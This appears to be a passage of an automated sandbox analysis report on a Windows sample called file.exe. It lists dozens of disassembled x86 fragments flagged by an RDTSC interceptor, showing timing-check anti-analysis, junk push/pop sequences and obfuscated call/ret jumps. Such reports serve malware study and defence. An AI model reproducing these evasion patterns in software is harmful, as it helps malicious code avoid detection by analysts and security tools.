                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAB6B second address: 9BAB8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAB8F second address: 9BABAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pop eax 0x00000007 stc 0x00000008 lea ebx, dword ptr [ebp+1244C683h] 0x0000000e sub dh, 00000051h 0x00000011 push eax 0x00000012 jo 00007F7448D3A000h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA639 second address: 9DA665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01E2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F74491B01DDh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA665 second address: 9DA671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F7448D39FF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8E2 second address: 9DA8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8E6 second address: 9DA8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7448D39FF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAEBB second address: 9DAEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB1B3 second address: 9DB1BD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB1BD second address: 9DB1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB1C3 second address: 9DB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB2F0 second address: 9DB2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB2F9 second address: 9DB2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBE29 second address: 9DBE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F74491B01D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF56 second address: 9DBF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 js 00007F7448D3A00Fh 0x0000000d jmp 00007F7448D3A009h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF7C second address: 9DBF86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF86 second address: 9DBFD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F7448D39FF6h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F7448D3A00Bh 0x00000021 jmp 00007F7448D3A005h 0x00000026 push edi 0x00000027 jg 00007F7448D39FF6h 0x0000002d pop edi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBFD0 second address: 9DBFD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC172 second address: 9DC178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC436 second address: 9DC445 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1014 second address: 9E1030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7448D3A000h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1030 second address: 9E1035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1035 second address: 9E103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E000C second address: 9E0016 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0016 second address: 9E002A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7448D39FFAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADCA0 second address: 9ADCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADCAA second address: 9ADCB4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7448D39FF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6075 second address: 9E609B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F74491B01D6h 0x0000000a jp 00007F74491B01D6h 0x00000010 jo 00007F74491B01D6h 0x00000016 popad 0x00000017 push edx 0x00000018 jmp 00007F74491B01DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E609B second address: 9E60D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F7448D3A00Eh 0x0000000b jmp 00007F7448D3A006h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F7448D39FFCh 0x0000001b jl 00007F7448D39FF8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E60D5 second address: 9E60DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E60DB second address: 9E60E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E66AD second address: 9E66D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F74491B01D6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E66D5 second address: 9E66DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6878 second address: 9E687E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E687E second address: 9E6887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA1BC second address: 9EA1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F74491B01D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F74491B01E7h 0x00000018 jnc 00007F74491B01D6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA1ED second address: 9EA1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA319 second address: 9EA31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA31D second address: 9EA321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA3C1 second address: 9EA3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAA6F second address: 9EAA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAB6E second address: 9EAB80 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F74491B01DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAB80 second address: 9EAB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7448D3A007h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAD18 second address: 9EAD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB037 second address: 9EB03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB03B second address: 9EB057 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB057 second address: 9EB06B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F7448D39FF6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB06B second address: 9EB071 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB071 second address: 9EB076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF37 second address: 9EBF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF3B second address: 9EBF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF41 second address: 9EBF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF47 second address: 9EBF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED13A second address: 9ED154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED820 second address: 9ED824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1077 second address: 9F1084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F74491B01D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1B40 second address: 9F1B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F7448D3A011h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5DA3 second address: 9F5DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5DA7 second address: 9F5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F7448D3A000h 0x0000000d nop 0x0000000e mov ebx, dword ptr [ebp+122D2D01h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7448D39FF8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push edi 0x00000031 pop edi 0x00000032 mov ebx, dword ptr [ebp+122D18A8h] 0x00000038 push 00000000h 0x0000003a mov edi, 47A750D7h 0x0000003f push eax 0x00000040 pushad 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6FD4 second address: 9F701C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F74491B01E9h 0x0000000e nop 0x0000000f movsx edi, cx 0x00000012 push 00000000h 0x00000014 mov edi, 103E8E64h 0x00000019 push 00000000h 0x0000001b mov bx, E7B1h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F74491B01E3h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F79 second address: 9F5F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F701C second address: 9F7022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7022 second address: 9F7026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F7D second address: 9F5F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F83 second address: 9F5FA2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7448D39FFAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FA2 second address: 9F5FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FA6 second address: 9F5FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F71BD second address: 9F71CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F74491B01D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FAC second address: 9F5FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8194 second address: 9F8198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA14D second address: 9FA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8198 second address: 9F81BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007F74491B01E2h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F74491B01D6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA151 second address: 9FA164 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F7448D39FF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA164 second address: 9FA187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01E5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB1A0 second address: 9FB1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA2D8 second address: 9FA393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F74491B01E0h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 jns 00007F74491B01DEh 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F74491B01D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov ebx, 66BD42E0h 0x0000003f adc edi, 7FDDC78Dh 0x00000045 mov eax, dword ptr [ebp+122D0029h] 0x0000004b jne 00007F74491B01DCh 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F74491B01D8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d mov dword ptr [ebp+122D21A5h], edx 0x00000073 mov edi, dword ptr [ebp+122D2A11h] 0x00000079 nop 0x0000007a pushad 0x0000007b jmp 00007F74491B01E1h 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA393 second address: 9FA3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D39FFDh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3AD second address: 9FA3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC206 second address: 9FC20B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3B1 second address: 9FA3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC20B second address: 9FC21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F7448D39FFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3B7 second address: 9FA3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC21D second address: 9FC221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC221 second address: 9FC2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F74491B01D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D2C59h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F74491B01D8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 push 00000000h 0x00000048 add di, 8110h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F74491B01E2h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC2A1 second address: 9FC2A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC2A7 second address: 9FC2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4CF second address: 9FC4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF353 second address: 9FF378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E9h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF378 second address: 9FF37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00447 second address: A00454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F74491B01DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF540 second address: 9FF544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
